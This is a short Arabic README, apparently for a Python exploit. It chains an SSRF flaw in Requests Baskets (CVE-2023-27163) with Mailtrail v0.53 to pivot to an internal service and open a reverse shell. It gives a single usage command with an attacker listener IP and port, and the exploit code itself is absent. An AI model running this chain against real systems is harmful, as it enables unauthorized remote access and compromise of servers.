
سلسلة استغلال بلغة Python تستخدم CVE-2023-27163 SSRF في Requests Baskets مع Mailtrail v0.53 لتمرير الخدمات الداخلية وتنفيذ reverse shell.
يستغل الاستغلال التالي ثغرة SSRF في Requests Baskets v1.2.1 لإعادة توجيه التطبيق الداخلي الذي يعمل على 127.0.0.1:80 إلى التطبيق الخارجي على /pwned. بمجرد إعادة توجيه تطبيق Mailtrail v0.53، سينفذ أمر reverse shell ضده، وخلال ثوانٍ قليلة يجب أن يحصل المستخدم على reverse shell على الجهاز.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT